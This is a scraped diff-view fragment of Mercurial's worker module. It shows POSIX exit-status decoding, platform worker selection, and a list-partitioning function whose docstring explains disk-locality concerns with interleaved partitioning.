190 except: # re-raises
191 killworkers()
191 killworkers()
192 cleanup()
192 cleanup()
193 raise
193 raise
194 cleanup()
194 cleanup()
195
195
196 def _posixexitstatus(code):
196 def _posixexitstatus(code):
197 '''convert a posix exit status into the same form returned by
197 '''convert a posix exit status into the same form returned by
198 os.spawnv
198 os.spawnv
199
199
200 returns None if the process was stopped instead of exiting'''
200 returns None if the process was stopped instead of exiting'''
201 if os.WIFEXITED(code):
201 if os.WIFEXITED(code):
202 return os.WEXITSTATUS(code)
202 return os.WEXITSTATUS(code)
203 elif os.WIFSIGNALED(code):
203 elif os.WIFSIGNALED(code):
204 return -os.WTERMSIG(code)
204 return -os.WTERMSIG(code)
205
205
if not pycompat.iswindows:
    # On POSIX platforms, select the fork/pipe-based worker implementation
    # and the matching waitpid-status decoder defined above.
    # NOTE(review): reconstructed from a scraped diff rendering (duplicated,
    # number-prefixed lines); logic unchanged.
    _platformworker = _posixworker
    _exitstatus = _posixexitstatus
209
209
def partition(lst, nslices):
    '''partition a list into N slices of roughly equal size

    Yields nslices lists; slice i contains every nslices-th element of
    lst starting at index i, so ordering within each slice follows the
    input and slice lengths differ by at most one.

    The current strategy takes every Nth element from the input. If
    we ever write workers that need to preserve grouping in input
    we should consider allowing callers to specify a partition strategy.

    mpm is not a fan of this partitioning strategy when files are involved.
    In his words:

        Single-threaded Mercurial makes a point of creating and visiting
        files in a fixed order (alphabetical). When creating files in order,
        a typical filesystem is likely to allocate them on nearby regions on
        disk. Thus, when revisiting in the same order, locality is maximized
        and various forms of OS and disk-level caching and read-ahead get a
        chance to work.

        This effect can be quite significant on spinning disks. I discovered it
        circa Mercurial v0.4 when revlogs were named by hashes of filenames.
        Tarring a repo and copying it to another disk effectively randomized
        the revlog ordering on disk by sorting the revlogs by hash and suddenly
        performance of my kernel checkout benchmark dropped by ~10x because the
        "working set" of sectors visited no longer fit in the drive's cache and
        the workload switched from streaming to random I/O.

        What we should really be doing is have workers read filenames from a
        ordered queue. This preserves locality and also keeps any worker from
        getting more than one file out of balance.
    '''
    # NOTE(review): reconstructed from a scraped diff rendering (duplicated,
    # number-prefixed lines); logic unchanged.
    for i in range(nslices):
        yield lst[i::nslices]
General Comments 0
You need to be logged in to leave comments. Login now